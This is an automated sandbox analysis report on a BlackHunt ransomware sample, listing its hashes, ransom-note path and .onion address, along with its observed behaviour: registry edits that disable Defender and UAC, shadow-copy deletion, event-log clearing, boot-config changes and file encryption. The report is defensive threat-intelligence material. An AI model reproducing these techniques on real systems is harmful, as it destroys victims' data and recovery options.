Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:11
Static task
static1
Behavioral task
behavioral1
Sample
44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe
Resource
win10v2004-20231215-en
General
-
Target
44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe
-
Size
707KB
-
MD5
697e9438bfce122b566b04f8676e97d4
-
SHA1
a32f01c792eeb2c48a72fb621f92e29c3dbdd392
-
SHA256
44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877
-
SHA512
ce79a5d0d6be405c1f149824b9c18552407c1622f55b4cd306c8b54d009d4625eb6153282b2ad418e40139d043c79c9dae51217fb122a7c0a52c904d23ed8783
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza128avnh:6uaTmkZJ+naie5OTamgEoKxLWF0h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2884 fsutil.exe 6044 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4900 wevtutil.exe 13332 wevtutil.exe 13812 wevtutil.exe 13800 wevtutil.exe 5972 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7768 bcdedit.exe 6548 bcdedit.exe 11284 bcdedit.exe 14272 bcdedit.exe -
Renames multiple (3382) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2392 wbadmin.exe 6652 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\Q: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\S: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\V: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\O: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\Z: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\N: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\U: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\A: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\G: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\J: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\B: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\K: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\X: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\I: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\T: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\P: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\Y: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\L: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened (read-only) \??\M: 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\plugin.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\az_get.svg 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ro-ro\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\cldr.md 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\collect_feedback\js\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files\Java\jre-1.8\release 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files\dotnet\shared\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\cacerts 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\he-il\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\sample-thumb.png 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_cs_135x40.svg 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\ui-strings.js 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.hta 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#BlackHunt_Private.key 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon.png 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#BlackHunt_ReadMe.txt 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\tr_get.svg 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4428 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7660 vssadmin.exe 7692 vssadmin.exe 7712 vssadmin.exe 13924 vssadmin.exe 4816 vssadmin.exe 7644 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7260 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 14164 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Token: SeRestorePrivilege 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Token: SeBackupPrivilege 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Token: SeTakeOwnershipPrivilege 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Token: SeAuditPrivilege 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Token: SeSecurityPrivilege 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Token: SeIncBasePriorityPrivilege 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Token: SeBackupPrivilege 5860 vssvc.exe Token: SeRestorePrivilege 5860 vssvc.exe Token: SeAuditPrivilege 5860 vssvc.exe Token: SeBackupPrivilege 5444 wbengine.exe Token: SeRestorePrivilege 5444 wbengine.exe Token: SeSecurityPrivilege 5444 wbengine.exe Token: SeSecurityPrivilege 4900 wevtutil.exe Token: SeBackupPrivilege 4900 wevtutil.exe Token: SeSecurityPrivilege 5972 wevtutil.exe Token: SeBackupPrivilege 5972 wevtutil.exe Token: SeSecurityPrivilege 13812 wevtutil.exe Token: SeBackupPrivilege 13812 wevtutil.exe Token: SeSecurityPrivilege 13332 wevtutil.exe Token: SeBackupPrivilege 13332 wevtutil.exe Token: SeSecurityPrivilege 13800 wevtutil.exe Token: SeBackupPrivilege 13800 wevtutil.exe Token: SeDebugPrivilege 7260 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4352 wrote to memory of 3516 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 160 PID 4352 wrote to memory of 3516 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 160 PID 4352 wrote to memory of 1780 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 175 PID 4352 wrote to memory of 1780 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 175 PID 4352 wrote to memory of 1176 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 171 PID 4352 wrote to memory of 1176 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 171 PID 4352 wrote to memory of 4344 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 97 PID 4352 wrote to memory of 4344 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 97 PID 4352 wrote to memory of 1640 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 99 PID 4352 wrote to memory of 1640 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 99 PID 4352 wrote to memory of 1612 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 101 PID 4352 wrote to memory of 1612 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 101 PID 4352 wrote to memory of 3552 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 105 PID 4352 wrote to memory of 3552 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 105 PID 3516 wrote to memory of 844 3516 Conhost.exe 104 PID 3516 wrote to memory of 844 3516 Conhost.exe 104 PID 4352 wrote to memory of 1488 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 107 PID 4352 wrote to memory of 1488 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 107 PID 1176 wrote to memory of 4532 1176 Conhost.exe 106 PID 1176 wrote to memory of 4532 1176 Conhost.exe 106 PID 4344 wrote to memory of 3276 4344 cmd.exe 109 PID 4344 wrote to memory of 3276 4344 cmd.exe 109 PID 1780 wrote to memory of 1644 1780 reg.exe 110 PID 1780 wrote to memory of 1644 1780 reg.exe 110 PID 4352 wrote to memory of 2264 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 114 PID 4352 wrote to memory of 2264 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 114 PID 4352 wrote to memory of 872 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 195 PID 4352 wrote to memory of 872 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 195 PID 1640 wrote to memory of 1064 1640 cmd.exe 198 PID 1640 wrote to memory of 1064 1640 cmd.exe 198 PID 4352 wrote to memory of 1916 4352 